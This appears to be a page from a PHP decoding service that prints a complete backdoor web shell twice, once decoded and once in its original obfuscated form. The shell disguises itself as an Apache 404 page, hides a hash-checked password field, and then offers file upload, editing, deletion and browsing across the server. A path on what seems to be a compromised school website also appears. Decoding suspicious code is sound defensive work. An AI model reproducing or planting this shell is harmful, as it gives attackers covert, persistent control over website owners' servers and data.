Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php http_response_code(404); goto RtuAI; jx7wU: function printLoginx() { echo "\x3c\x21\..
Decoded Output download
<?php http_response_code(404); goto RtuAI; jx7wU: function printLoginx() { echo "<!DOCTYPE html><html><head><meta name="robots" content"noindex, nofollow"><title></title></head><body><h1>Not Found</h1><title>404 Not Found</title><style type="text/css"> input[type=password] { width: 250px; height: 25px; color: white; background: transparent; border: 1px solid white; margin-left: 20px; text-align: center; }</style><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at " . $_SERVER["HTTP_HOST"] . " Port " . $_SERVER["SERVER_PORT"] . "</address>\x9<center><form method="post"><input type="password" name="" . $_SESSION["keyxx"] . "" autocomplete="off"><br></form></center></body></html>"; die; } goto qg6oq; ZkKvV: function generateRandomString($length = 10) { $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString; } goto jx7wU; RtuAI: session_start(); goto ZkKvV; c6YzZ: if (empty($_SESSION["keyxx"])) { $keyxxx = generateRandomString(); $_SESSION["keyxx"] = $keyxxx; } goto KEysE; qg6oq: $auth_pass5 = "1b1cecaebd825dde76103ea7722c30ae3fffb206"; goto c6YzZ; KEysE: $keyxx = $_SESSION["keyxx"]; goto ObDIp; ObDIp: if (empty($_SESSION[sha1(md5($_SERVER["HTTP_HOST"])) . $keyxx])) { if (isset($_POST[$keyxx]) and sha1(md5($_POST[$keyxx])) == $auth_pass5) { $_SESSION[sha1(md5($_SERVER["HTTP_HOST"])) . $keyxx] = true; } else { printLoginx(); die; } }error_reporting(0);define("self", "X<sup>124</sup>");$scD = "scandir";$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65"); for ($i = 0; $i < count($fc); $i++) { $fc[$i] = nhx($fc[$i]); } if (isset($_GET["p"])) { $p = nhx($_GET["p"]);$fc[3](nhx($_GET["p"]));} else {$p = $fc[2]();} function hex($str) {$r = "";for ($i = 0; $i < strlen($str); $i++) {$r .= dechex(ord($str[$i]));}return $r;} function nhx($str) {$r = "";$len = (strlen($str) -1);for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i+1])); }return $r;} function perms($f) { $p = fileperms($f); if (($p & 0xC000) == 0xC000) { $i = 's';} elseif (($p & 0xA000) == 0xA000) {$i = 'l';} elseif (($p & 0x8000) == 0x8000) {$i = '-';} elseif (($p & 0x6000) == 0x6000) {$i = 'b';} elseif (($p & 0x4000) == 0x4000) {$i = 'd';} elseif (($p & 0x2000) == 0x2000) {$i = 'c';} elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-')); return $i; } function a($msg, $sts = 1, $loc = "") { global $p; $status = (($sts == 1) ? "success" : "error"); echo "<script>swal({title: '{$status}', text: '{$msg}', icon: '{$status}'}).then((btnClick) => {if(btnClick){document.location.href='?p=".hex($p).$loc."'}})</script>"; } function deldir($d) { global $fc; if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return; if ($fc[6]($d)) { array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); rmdir($d); } else { unlink($d); } } ?> <!doctype html><html lang="en"><head><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title>X</title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0;color:#fff;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div><div> [ <a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a> ] [ <a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a> ]</div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form></div> <?php if (isset($_FILES["f"])) { $n = $_FILES["f"]["name"]; for ($i = 0; $i < count($n); $i++) { if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) { a("file uploaded successfully"); } else { a("file failed to upload", 0); } } } ?></div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span> <?php $ps = $fc[4]("/(\\\|\/)/", $p); foreach ($ps as $k => $v) { if ($k == 0 && $v == "") { echo "<a href='?p=2f'>~</a>/"; continue; } if ($v == "") continue; echo "<a href='?p="; for ($i = 0; $i <= $k; $i++) { echo hex($ps[$i]); if ($i != $k) echo "2f"; } echo "'>{$v}</a>/"; } ?> </div></div><article class="bg-dark border table-responsive mt-2"> <?php if (!isset($_GET["a"])): ?> <table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light"><?php $scD = $fc[5]($scD($p), [".", ".."]); foreach ($scD as $d) { if (!$fc[6]("$p/$d")) continue; echo "<tr><td><a href='?p=".hex("$p/$d")."' data-toggle='tooltip' data-placement='auto' title='Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$d"))."'><i class='fa fa-fw fa-folder'></i> {$d}</a></td><td>Directory</td><td><font color='".(($fc[8]("$p/$d")) ? "#00ff00" : (!$fc[9]("$p/$d") ? "red" : null))."'>".perms("$p/$d")."</font></td><td><a href='?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d' data-toggle='tooltip' data-placement='auto' title='Rename'><i class='fa fa-fw fa-pencil'></i></a><a href='?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."' class='delete' data-type='folder' data-toggle='tooltip' data-placement='auto' title='Delete'><i class='fa fa-fw fa-trash'></i></a></td></tr>"; } foreach ($scD as $f) { if (!$fc[7]("$p/$f")) continue; $sz = $fc[10]("$p/$f")/1024; $sz = round($sz, 3); $sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB"; echo "<tr><td><a href='?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."' data-toggle='tooltip' data-placement='auto' title='Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$f"))."'><i class='fa fa-fw fa-file'></i> {$f}</a></td><td>{$sz}</td><td><font color='".(($fc[8]("$p/$f")) ? "#00ff00" : (!$fc[9]("$p/$f") ? "red" : null))."'>".perms("$p/$f")."</font></td><td><div class='d-flex justify-content-between'><a href='?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."' data-toggle='tooltip' data-placement='auto' title='Edit'><i class='fa fa-fw fa-edit'></i></a><a href='?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f' data-toggle='tooltip' data-placement='auto' title='Rename'><i class='fa fa-fw fa-pencil'></i></a><a href='?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."' class='delete' data-type='file' data-toggle='tooltip' data-placement='auto' title='Delete'><i class='fa fa-fw fa-trash'></i></a></div></td></tr>"; } ?></tbody></table> <?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?> <div class="px-2 py-2"> <?php if ($a == "delete") { $loc = $p.'/'.nhx($_GET["n"]); if ($_GET["t"] == "d") { deldir($loc); if (!$fc[12]($loc)) { a("folder deleted"); } else { a("failed to delete the folder", 0); } } if ($_GET["t"] == "f") { $loc = $p.'/'.nhx($_GET["n"]); unlink($loc); if (!$fc[12]($loc)) { a("file deleted"); } else { a("file to delete the folder", 0); } } } ?> <?php if ($a == "newDir"): ?> <h5 class="border p-1 mb-3">New folder</h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($fc[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?> <h5 class="border p-1 mb-3">New file</h5> <form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($fc[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?> <h5 class="border p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?> <h5 class="border p-1 mb-3">Edit file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?> <h5 class="border p-1 mb-3">View file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><?php endif; ?></div><?php endif; ?></article><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>
Change dir:
/home/eschool/domains/kcw.ac.th/public_html/Admission/vendor/mpdf/mpdf/patterns/
Read file:
Make dir: [ Writeable ]
Make file: [ Writeable ]
Execute:
Upload file: [ Writeable ]
No file chosen
Did this file decode correctly?
Original Code
<?php http_response_code(404); goto RtuAI; jx7wU: function printLoginx() { echo "\x3c\x21\104\x4f\x43\x54\131\x50\105\40\150\x74\x6d\154\x3e\74\x68\164\155\x6c\x3e\74\x68\x65\x61\x64\76\74\155\145\x74\x61\40\156\x61\155\145\x3d\42\162\x6f\142\x6f\x74\x73\42\40\143\x6f\156\164\x65\156\164\42\x6e\157\151\156\144\x65\x78\54\40\156\157\x66\157\154\x6c\x6f\x77\42\76\x3c\x74\x69\x74\154\145\76\74\57\164\151\164\x6c\145\76\x3c\57\150\x65\141\x64\x3e\x3c\142\157\144\x79\x3e\x3c\x68\61\76\116\x6f\x74\x20\106\157\x75\x6e\144\74\x2f\150\61\x3e\74\x74\x69\x74\154\145\x3e\x34\60\x34\40\x4e\x6f\164\x20\106\157\165\x6e\x64\74\x2f\x74\151\164\154\x65\76\x3c\x73\164\x79\x6c\145\40\164\171\160\145\75\42\x74\145\170\x74\x2f\143\163\163\x22\76\11\151\x6e\160\165\x74\133\x74\x79\x70\145\75\x70\141\x73\x73\x77\x6f\x72\144\135\x20\173\40\167\x69\x64\164\150\72\40\x32\65\60\x70\170\x3b\40\150\x65\151\x67\150\x74\72\x20\x32\x35\x70\x78\x3b\40\x63\x6f\x6c\x6f\162\72\x20\x77\150\151\x74\145\73\x20\x62\141\143\153\x67\x72\157\x75\156\144\x3a\40\164\162\141\x6e\163\x70\x61\162\x65\156\x74\x3b\40\142\157\162\x64\145\162\x3a\40\61\160\170\40\163\157\x6c\x69\x64\40\167\x68\151\x74\145\x3b\40\155\x61\162\x67\151\x6e\x2d\154\x65\146\x74\x3a\40\62\60\160\x78\73\40\164\x65\170\164\55\x61\154\x69\147\x6e\x3a\40\x63\x65\156\164\x65\162\73\x20\175\x3c\x2f\163\x74\171\154\145\76\x3c\x70\76\124\150\x65\x20\x72\145\x71\165\x65\163\164\x65\x64\40\x55\x52\114\x20\x77\141\163\40\x6e\x6f\x74\x20\x66\157\165\156\x64\40\157\x6e\x20\164\x68\x69\x73\40\163\145\162\x76\x65\162\56\x3c\57\x70\76\x3c\160\76\101\x64\x64\x69\x74\151\x6f\x6e\x61\154\x6c\171\54\40\x61\40\x34\60\64\40\x4e\157\x74\40\x46\x6f\165\x6e\144\40\x65\162\162\157\x72\40\x77\x61\x73\40\x65\156\143\157\x75\x6e\x74\x65\x72\x65\x64\x20\167\x68\151\154\x65\40\x74\x72\x79\x69\156\x67\40\164\157\x20\x75\163\x65\40\x61\x6e\40\105\x72\162\x6f\x72\104\157\143\x75\x6d\145\x6e\x74\40\x74\x6f\40\150\x61\x6e\x64\x6c\x65\40\x74\150\145\40\x72\x65\x71\165\x65\163\164\x2e\x3c\57\x70\x3e\74\150\x72\76\x3c\141\x64\144\x72\145\x73\163\76\101\160\x61\143\x68\x65\x20\x53\145\162\166\x65\162\x20\141\164\40" . $_SERVER["\x48\x54\124\120\x5f\110\117\123\x54"] . "\x20\120\x6f\x72\164\40" . $_SERVER["\123\x45\x52\126\105\x52\x5f\x50\117\122\124"] . "\x3c\x2f\141\144\x64\x72\145\x73\163\76\x9\74\143\x65\x6e\164\145\x72\76\x3c\146\x6f\x72\155\x20\155\145\164\x68\157\x64\x3d\42\x70\157\x73\164\42\x3e\x3c\151\156\x70\x75\164\x20\x74\x79\x70\x65\x3d\42\x70\x61\163\163\x77\157\x72\x64\x22\40\156\x61\155\145\x3d\42" . $_SESSION["\x6b\145\171\170\x78"] . "\x22\40\141\165\x74\x6f\143\157\x6d\x70\x6c\145\x74\x65\x3d\x22\157\146\x66\x22\76\74\142\x72\x3e\x3c\x2f\146\157\162\155\76\74\57\143\145\x6e\x74\145\x72\x3e\x3c\x2f\142\x6f\144\171\76\74\57\150\x74\x6d\154\x3e"; die; } goto qg6oq; ZkKvV: function generateRandomString($length = 10) { $characters = "\60\61\x32\63\x34\65\66\67\70\71\141\x62\x63\144\x65\x66\x67\150\x69\x6a\x6b\154\x6d\x6e\x6f\x70\x71\x72\x73\164\165\166\167\x78\x79\172\101\x42\103\104\x45\106\x47\x48\x49\112\x4b\x4c\115\116\117\120\121\x52\123\124\125\x56\x57\130\x59\x5a"; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString; } goto jx7wU; RtuAI: session_start(); goto ZkKvV; c6YzZ: if (empty($_SESSION["\x6b\x65\171\170\170"])) { $keyxxx = generateRandomString(); $_SESSION["\153\145\171\170\x78"] = $keyxxx; } goto KEysE; qg6oq: $auth_pass5 = "\x31\x62\x31\x63\x65\x63\x61\x65\x62\x64\x38\x32\x35\x64\x64\x65\x37\x36\x31\x30\x33\x65\x61\x37\x37\x32\x32\x63\x33\x30\x61\x65\x33\x66\x66\x66\x62\x32\x30\x36"; goto c6YzZ; KEysE: $keyxx = $_SESSION["\153\x65\171\170\170"]; goto ObDIp; ObDIp: if (empty($_SESSION[sha1(md5($_SERVER["\110\x54\x54\120\x5f\x48\117\x53\124"])) . $keyxx])) { if (isset($_POST[$keyxx]) and sha1(md5($_POST[$keyxx])) == $auth_pass5) { $_SESSION[sha1(md5($_SERVER["\x48\124\124\x50\x5f\x48\x4f\123\124"])) . $keyxx] = true; } else { printLoginx(); die; } }error_reporting(0);define("self", "\x58<sup>\x31\x32\x34</sup>");$scD = "s\x63\x61\x6e\x64\x69r";$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65"); for ($i = 0; $i < count($fc); $i++) { $fc[$i] = nhx($fc[$i]); } if (isset($_GET["p"])) { $p = nhx($_GET["p"]);$fc[3](nhx($_GET["p"]));} else {$p = $fc[2]();} function hex($str) {$r = "";for ($i = 0; $i < strlen($str); $i++) {$r .= dechex(ord($str[$i]));}return $r;} function nhx($str) {$r = "";$len = (strlen($str) -1);for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i+1])); }return $r;} function perms($f) { $p = fileperms($f); if (($p & 0xC000) == 0xC000) { $i = 's';} elseif (($p & 0xA000) == 0xA000) {$i = 'l';} elseif (($p & 0x8000) == 0x8000) {$i = '-';} elseif (($p & 0x6000) == 0x6000) {$i = 'b';} elseif (($p & 0x4000) == 0x4000) {$i = 'd';} elseif (($p & 0x2000) == 0x2000) {$i = 'c';} elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-')); return $i; } function a($msg, $sts = 1, $loc = "") { global $p; $status = (($sts == 1) ? "success" : "error"); echo "<script>swal({title: '{$status}', text: '{$msg}', icon: '{$status}'}).then((btnClick) => {if(btnClick){document.location.href='?p=".hex($p).$loc."'}})</script>"; } function deldir($d) { global $fc; if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return; if ($fc[6]($d)) { array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); rmdir($d); } else { unlink($d); } } ?> <!doctype html><html lang="en"><head><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title>X</title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0;color:#fff;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div><div> [ <a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a> ] [ <a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a> ]</div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form></div> <?php if (isset($_FILES["f"])) { $n = $_FILES["f"]["name"]; for ($i = 0; $i < count($n); $i++) { if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) { a("file uploaded successfully"); } else { a("file failed to upload", 0); } } } ?></div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span> <?php $ps = $fc[4]("/(\\\|\/)/", $p); foreach ($ps as $k => $v) { if ($k == 0 && $v == "") { echo "<a href='?p=2f'>~</a>/"; continue; } if ($v == "") continue; echo "<a href='?p="; for ($i = 0; $i <= $k; $i++) { echo hex($ps[$i]); if ($i != $k) echo "2f"; } echo "'>{$v}</a>/"; } ?> </div></div><article class="bg-dark border table-responsive mt-2"> <?php if (!isset($_GET["a"])): ?> <table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light"><?php $scD = $fc[5]($scD($p), [".", ".."]); foreach ($scD as $d) { if (!$fc[6]("$p/$d")) continue; echo "<tr><td><a href='?p=".hex("$p/$d")."' data-toggle='tooltip' data-placement='auto' title='Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$d"))."'><i class='fa fa-fw fa-folder'></i> {$d}</a></td><td>Directory</td><td><font color='".(($fc[8]("$p/$d")) ? "#00ff00" : (!$fc[9]("$p/$d") ? "red" : null))."'>".perms("$p/$d")."</font></td><td><a href='?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d' data-toggle='tooltip' data-placement='auto' title='Rename'><i class='fa fa-fw fa-pencil'></i></a><a href='?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."' class='delete' data-type='folder' data-toggle='tooltip' data-placement='auto' title='Delete'><i class='fa fa-fw fa-trash'></i></a></td></tr>"; } foreach ($scD as $f) { if (!$fc[7]("$p/$f")) continue; $sz = $fc[10]("$p/$f")/1024; $sz = round($sz, 3); $sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB"; echo "<tr><td><a href='?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."' data-toggle='tooltip' data-placement='auto' title='Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$f"))."'><i class='fa fa-fw fa-file'></i> {$f}</a></td><td>{$sz}</td><td><font color='".(($fc[8]("$p/$f")) ? "#00ff00" : (!$fc[9]("$p/$f") ? "red" : null))."'>".perms("$p/$f")."</font></td><td><div class='d-flex justify-content-between'><a href='?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."' data-toggle='tooltip' data-placement='auto' title='Edit'><i class='fa fa-fw fa-edit'></i></a><a href='?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f' data-toggle='tooltip' data-placement='auto' title='Rename'><i class='fa fa-fw fa-pencil'></i></a><a href='?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."' class='delete' data-type='file' data-toggle='tooltip' data-placement='auto' title='Delete'><i class='fa fa-fw fa-trash'></i></a></div></td></tr>"; } ?></tbody></table> <?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?> <div class="px-2 py-2"> <?php if ($a == "delete") { $loc = $p.'/'.nhx($_GET["n"]); if ($_GET["t"] == "d") { deldir($loc); if (!$fc[12]($loc)) { a("folder deleted"); } else { a("failed to delete the folder", 0); } } if ($_GET["t"] == "f") { $loc = $p.'/'.nhx($_GET["n"]); unlink($loc); if (!$fc[12]($loc)) { a("file deleted"); } else { a("file to delete the folder", 0); } } } ?> <?php if ($a == "newDir"): ?> <h5 class="border p-1 mb-3">New folder</h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($fc[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?> <h5 class="border p-1 mb-3">New file</h5> <form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($fc[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?> <h5 class="border p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?> <h5 class="border p-1 mb-3">Edit file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($fc[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?> <h5 class="border p-1 mb-3">View file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><?php endif; ?></div><?php endif; ?></article><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return 